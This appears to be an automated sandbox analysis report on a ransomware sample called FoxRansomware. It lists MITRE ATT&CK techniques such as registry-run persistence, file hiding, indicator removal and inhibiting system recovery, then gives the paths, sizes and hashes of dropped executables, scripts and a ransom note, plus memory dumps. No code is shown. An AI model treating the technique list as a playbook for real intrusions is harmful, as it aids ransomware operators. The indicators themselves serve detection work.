Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-609813121-2907144057-1731107329-1000\desktop.ini

Filesize
1KB

MD5
19288bfbb9a28b63ec8d29c836ef43d2

SHA1
1e6c5e24f851cf45c1eb5d31152fd0e3207db2c1

SHA256
fcf5f5b0732b04400d0aa40fae6791afc038ee8c3e0faa59b0e7de8d5af15683

SHA512
c53a502a268565a331e6db2d4f645b11a47794f14917f6ec4f4f4b8860906f31b69479de49bcc2021464f94dc5351800fa0afbfa5c96d4aa44ce7c9d04717675

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWB3LaOf.exe

Filesize
1.2MB

MD5
1fa1b6d4b3ed867c1d4baffc77417611

SHA1
afb5e385f9cc8910d7a970b6c32b8d79295579da

SHA256
91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53

SHA512
0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\X9DSNOeI.txt

Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_3251001E59D73653.txt

Filesize
569B

MD5
57b2f98b76e209161007ae1e14949161

SHA1
78921313624b41c44dd1772602dc58a8be398324

SHA256
ca8f34588b738b752fd38a62545537c1a68dfd17315b4e71c272b5d8ac47f40f

SHA512
69c66d0961ed8e676d043157005075de1d4802d6dd46f865c3b5585fe70eb7a3aeabbb99cf73a10bd025e40ea97a46435b8744b77c64abf212c1191b52880ab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_3251001E59D73653.txt

Filesize
670B

MD5
65f3c1a061be787b361efb5c5c7d3a85

SHA1
9fff30147c6a6599b0a83bd59ba45d019214160f

SHA256
29f3d4b87be799748a16c1ae5a18cd518b70db8aae719356c5f5a205514d8228

SHA512
52aa5a76d67a3c303d414076b463fa84b868b2f6a8e2dc56e66c2bee4b497fffe410a2e3f30054c66d3fc4833dd2e9118b94b20dd33516fe8790c39c3e4bc8a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_3251001E59D73653.txt

Filesize
775B

MD5
f971416734860f8aee126b16308ca5c2

SHA1
a42c31e43f66a261df503532b9e44950311fe24e

SHA256
89bb93bf1aabb33fb0c184fbe8864f7eb19d36a6610bb5a6afea30f7757ae4ed

SHA512
eabc7321c9dfd25e805841e7a761f4ffa8b1b91bbd6affaa38f9a33a2609a782a90a5c00ef4dec91d19ef384835de2c19832cccdef90d8d0df96c5338b007435

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_3251001E59D73653.txt

Filesize
2KB

MD5
b3b2d21324fcaf8739cd36f232e236b8

SHA1
62637b04622c651f4d33b12ca46b1dda2d6a39c1

SHA256
23d3cc9a2b501ab445ec9c0c919f0f693bdaa0452bd6e87dd094c39084b696d4

SHA512
e5c005b2350e1763a405695c203a575a3a63a6363493371a76c314e307e6eb8f7420a74e6272d0e2409f10d20c50441411ec5e42d5af44294547814c504a12ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\k5CUy3US.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\wuxDdps2.bat

Filesize
246B

MD5
1abcd573d2cbd7a875ca5482d2b1a664

SHA1
698b2ad460bffe2892cf024af79623837e635692

SHA256
397d05d818dce04dd745193b13dcc8daa18a79ef098ead9128e59a1dfa8709c3

SHA512
baee2c89075e1215a18d071ffbd333a4aeb4306c02be45b1760166ed877fdb9fd6f82794363e88a3ff94f700bf0e619e3389c71b4544f7dacabe38fdb1152448

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hucr2ood.idg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\k5CUy3US64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Roaming\37TWMJXM.bat

Filesize
265B

MD5
2d4702b857e85e072fa830dc66007758

SHA1
75df909e0c4a95cf8af2ca6d9078db2245801e23

SHA256
6b99392060fa7f0fabf5011a033b1e5cd1ed43dfc60aac4629d8e1976a1f31cf

SHA512
79505750c06884f30b0b5cf7612aceb1a2c0410fa76fcc5b798c903e961ffbc39d838ce17d9a8aeda7e46425aebb9c64ec8406eab2445b592a2f908de5a99be4

Download Submit
C:\Users\Admin\AppData\Roaming\6G9cJgYG.vbs

Filesize
260B

MD5
d3ae55ebf22d4be9f3f75cc781c99af7

SHA1
7a8c20ff1f0c4373b037c0328dc2947d5573be75

SHA256
638c6f4c310b0544f790927dfcda235ce27975c749f6e1b59d63c69c5d152f3e

SHA512
17e886e793abb164b45b7ef01f3f94141985fb9f6d97f182916233dd28044008ba3389e014b3173306fa3d4fece8d812cc1cd6bed2e2d7f7f8bb99200b559cc8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7nvvjyxe.default-release\#FOX_README#.rtf

Filesize
8KB

MD5
ccdb87e1364e99789fb8ca2a08c2ca60

SHA1
21c76551a59710775533ee57c74af86a44448e37

SHA256
755559645aee3ff82bdfb622f1d2c4769c800f337b50ad6ceb6cf11da0b34eb3

SHA512
6463d34cacd3e77f57967e9b96bc7e609030e4183a2790659990c890347bca884b357d54946b1cee60023f99434971fb9d401c20b17a5280dd5188e17a16ae2d

Download Submit
memory/396-1487-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/396-3253-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1804-26-0x0000000005DC0000-0x0000000006114000-memory.dmp

Filesize
3.3MB

Download
memory/1804-10-0x0000000002920000-0x0000000002956000-memory.dmp

Filesize
216KB

Download
memory/1804-34-0x00000000746B0000-0x0000000074E60000-memory.dmp

Filesize
7.7MB

Download
memory/1804-30-0x0000000007A90000-0x000000000810A000-memory.dmp

Filesize
6.5MB

Download
memory/1804-29-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

Filesize
64KB

Download
memory/1804-8-0x00000000746B0000-0x0000000074E60000-memory.dmp

Filesize
7.7MB

Download
memory/1804-28-0x0000000006290000-0x00000000062DC000-memory.dmp

Filesize
304KB

Download
memory/1804-27-0x0000000006240000-0x000000000625E000-memory.dmp

Filesize
120KB

Download
memory/1804-17-0x0000000005C50000-0x0000000005CB6000-memory.dmp

Filesize
408KB

Download
memory/1804-15-0x0000000005520000-0x0000000005586000-memory.dmp

Filesize
408KB

Download
memory/1804-14-0x0000000005380000-0x00000000053A2000-memory.dmp

Filesize
136KB

Download
memory/1804-9-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

Filesize
64KB

Download
memory/1804-12-0x0000000005620000-0x0000000005C48000-memory.dmp

Filesize
6.2MB

Download
memory/1804-31-0x0000000006720000-0x000000000673A000-memory.dmp

Filesize
104KB

Download
memory/1804-11-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

Filesize
64KB

Download
memory/2004-3359-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-4831-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-2691-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-3640-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-3731-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-7-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-3888-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-8922-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-455-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-4085-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-6809-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-4525-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2004-5235-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/4988-3127-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/4988-4594-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/4988-6052-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/4988-4334-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/4988-13-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/4988-3830-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download